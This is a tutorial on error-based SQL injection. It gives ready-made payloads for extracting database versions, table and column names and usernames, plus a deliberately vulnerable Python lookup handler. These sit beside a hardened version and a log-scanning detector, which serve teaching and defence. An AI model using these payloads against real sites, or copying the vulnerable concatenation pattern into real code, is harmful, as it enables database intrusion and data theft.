Error-Based SQL Injection relies on forcing the database to throw errors that reveal sensitive information. These errors can expose database structure, table names, column names, or even data.
How it works:

Identify the Vulnerability: input a single quote (') or another special character and check whether the application returns a raw SQL error.
Example: if vulnerable, a request such as
http://example.com/products?id=1'
might return an error like:
You have an error in your SQL syntax; check the manual near ''' at line 1

Force Errors to Extract Information: use SQL functions such as CAST(), CONVERT() or EXTRACTVALUE() to generate errors whose text contains the value that was queried. Which function yields an informative error is engine-specific: EXTRACTVALUE() exists only in MySQL, and the CAST-to-integer form relies on the engine quoting the offending value in its conversion error.
Example: extract the database version. If the injection succeeds, the conversion error reveals the version string:
http://example.com/products?id=1' AND 1=CAST((SELECT version()) AS INT)--

Extract Table and Column Names: query the information_schema database to enumerate table and column names.
Example: extract the first table name:
http://example.com/products?id=1 AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) AS INT)--
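To show the defensive side of the steps above, here is an added example (not code from the original page) of a product-lookup handler written two ways against a constructed in-memory SQLite table. The vulnerable version concatenates the id parameter into SQL and echoes the engine's error text to the caller, so a single quote produces exactly the kind of raw error the page describes and a boolean payload changes the query. The hardened version validates the input, binds it as a parameter and returns a generic message, so the same inputs neither leak an error nor alter the query. SQLite's error wording differs from MySQL's, but the leak mechanism is the same. The function names, the products table and the sample rows are assumptions made for this example.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory catalogue standing in for the app's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO products (id, name) VALUES (?, ?)",
        [(1, "widget"), (2, "gadget")],
    )
    return conn


def lookup_vulnerable(conn, product_id):
    """Concatenates untrusted input into SQL and reflects the raw engine error.

    Both defects are deliberate: this is the pattern error-based injection abuses.
    """
    sql = "SELECT name FROM products WHERE id = " + product_id
    try:
        row = conn.execute(sql).fetchone()
        return {"ok": True, "name": row[0] if row else None}
    except sqlite3.Error as exc:
        # Returning the engine's message is the information leak.
        return {"ok": False, "error": str(exc)}


def lookup_hardened(conn, product_id):
    """Type-checks the input, binds it as a parameter, and never exposes DB errors."""
    if not product_id.isdigit():
        return {"ok": False, "error": "invalid request"}
    try:
        row = conn.execute(
            "SELECT name FROM products WHERE id = ?", (int(product_id),)
        ).fetchone()
        return {"ok": True, "name": row[0] if row else None}
    except sqlite3.Error:
        # Log the exception server-side; the client only sees a generic message.
        return {"ok": False, "error": "invalid request"}


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "0 OR 1=1"):
        print(repr(probe), "vulnerable:", lookup_vulnerable(db, probe))
        print(repr(probe), "hardened:  ", lookup_hardened(db, probe))
```

Run it and compare the two rows per probe: the quote probe makes the vulnerable handler return SQLite's tokenizer error verbatim, and the `0 OR 1=1` probe makes it return the first product even though no such id exists, while the hardened handler answers "invalid request" to both and only resolves genuine numeric ids.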
Here are some example payloads for Error-Based SQL Injection:
Extract Database Version:
AND 1=CAST((SELECT version()) AS INT)--
Extract Table Names:
AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) AS INT)--
Extract Column Names:
AND 1=CAST((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) AS INT)--
Extract Data:
AND 1=CAST((SELECT username FROM users LIMIT 1) AS INT)--
Using EXTRACTVALUE for XML Errors:
AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT version())))--
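Because the payload families listed above share recognisable tokens, a defender can flag them in web-server logs even when the response body is not available. The following added example (not part of the original page) decodes the query string of constructed access-log lines and matches three signatures derived from the payloads on this page: a CAST or CONVERT wrapped around a subquery, information_schema enumeration, and EXTRACTVALUE. The log lines, function names and signature names are constructed for the example; a real deployment would tune the patterns to its own traffic and correlate hits with 500 responses.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload families shown on this page. Matching runs on the
# URL-decoded query string so percent-encoding and '+' do not hide the tokens.
SIGNATURES = {
    "cast_subquery": re.compile(r"\b(?:CAST|CONVERT)\s*\(\s*\(\s*SELECT\b", re.I),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I
    ),
    "extractvalue": re.compile(r"\bEXTRACTVALUE\s*\(", re.I),
}


def classify_request(query_string):
    """Return the names of every signature the decoded query string matches."""
    decoded = unquote_plus(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (line_number, matched_signatures) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        # Pull the request target out of a combined-format line: "GET /path?qs HTTP/1.1"
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if not m:
            continue
        query_string = m.group(1).partition("?")[2]
        matches = classify_request(query_string)
        if matches:
            hits.append((n, matches))
    return hits


# Constructed sample access-log lines (not real traffic); the payloads are the
# URL-encoded forms of the examples on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /products?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /products?id=1%27+AND+1%3DCAST%28%28SELECT+version%28%29%29+AS+INT%29-- HTTP/1.1" 500 233',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /products?id=1+AND+1%3DCAST%28%28SELECT+table_name+FROM+information_schema.tables+LIMIT+1%29+AS+INT%29-- HTTP/1.1" 500 240',
    '10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /products?id=1+AND+EXTRACTVALUE%281%2C+CONCAT%280x3a%2C+%28SELECT+version%28%29%29%29%29-- HTTP/1.1" 500 198',
]


if __name__ == "__main__":
    for line_no, matched in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(matched)}")
```

The benign first line produces no hit; the remaining three are flagged with the signature family they belong to, and the second information_schema payload triggers two signatures at once, which is useful for scoring rather than treating every match as equal.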